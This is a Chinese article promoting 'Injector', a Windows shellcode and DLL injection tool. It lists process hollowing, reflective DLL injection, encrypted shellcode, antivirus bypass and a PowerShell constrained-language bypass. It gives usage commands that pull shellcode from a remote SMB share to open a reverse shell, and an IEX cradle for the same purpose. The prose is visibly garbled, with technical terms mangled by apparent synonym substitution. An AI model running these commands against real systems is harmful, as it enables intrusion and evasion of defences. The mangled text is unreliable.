有关Injector
Injector是一款功能完善且强悍的运行内存注入工具,该工具集成化了多种多样技术性,可以协助蓝队科学研究技术人员完成在Windows系统下的运行内存注入。
Injector能干什么?
对于虚拟服务器和本地存储给予Shellcode注入支持。只需特定Shellcode文档,该工具将协助大家进行后面的任何事儿。默认设置状况下,工具会将Shellcode注入至exe,要是没有寻找总体目标进程,它可能建立一个文本文档进程,并注入在其中完成分布式锁感柒。
- 支持反射DLL注入,工具将免费下载DLL并注入远程控制进程。
- 根据exe完成进程镂空雕花。
- 应用-bypass主要参数,以支持应用更高等级的、未记录的API来开展进程注入。
- 支持加密的Shellcode,例如AES加密或异或运算加密等。
- 支持对于PowerShell的CLM绕开,可以立即将编码存避免可以实行C#编码的授权管理文件夹名称中,例如“C:\Windows\Tasks”。
- 支持DLL镂空雕花,根据dll完成。
工具免费下载
众多科学研究工作人员可以应用以下指令将该新项目源代码复制至当地:
gitclonehttps://github.com/0xDivyanshu/Injector.git
工具协助
C:\Users\admin>Injector.exeHelpOptionsforXenon:-mModeofoperation-m1SpecifiesthemodeasProcessinjection-m2SpecifiesthemodeasReflectiveDLLInjection-m3SpecifiesthemodeasProcessHollowing-m4Noinjection!Givememydamnshell-m5PowershellsessionviaCLMbypass-m6DLLhollowing-TempFileFilelocationthatyourcurrentusercanread-shellcodeUseshellcode-dllUsedll-decrypt-xorSpecifyXordecryptionforshellcode-passSpeciftythepasswordforXordecryption-decrypt-aesSpecifyaesdecryptionforshellcode-passSpeciftythepasswordforaesdecryption-locationSpecifythelocationi.eeitherserverorlocal-bypassUsesenhanceattemptstobypassAV
如需转化成加密的Shellcode,请在Kali下应用Helper.exe。
工具使用样例
Injector.exe-m=1-shellcode-encrypt-aes-pass=password-location="\\192.x.x.x\share\shellcode.txt"-bypass
以上指令将破译你的Shellcode并让你一个反方向Shell。
假如你不希望应用加密的Shellcode,你还可以同时应用以下指令运作以下指令:
Injector.exe-m=1-shellcode-location="\\192.x.x.x\share\shellcode.txt"
将当中的“-m=1”改动为“2,3,4,6”以后,就可以运作别的方式了:
Injector.exe-m=5-TempFile=C:\\Users\\user\\sample.txt
以上指令将给予要给对话,我们可以应用它来实行IEX cradle,并获得一个可以绕开CLM的反方向Shell。
PowerShell
你还是可以应用Invoke-Exe.ps1来根据PowerShel实行Injector:
Invoke-Exe-locC:\Users\john\injector.exe
新项目详细地址
Injector:【GitHub传送器】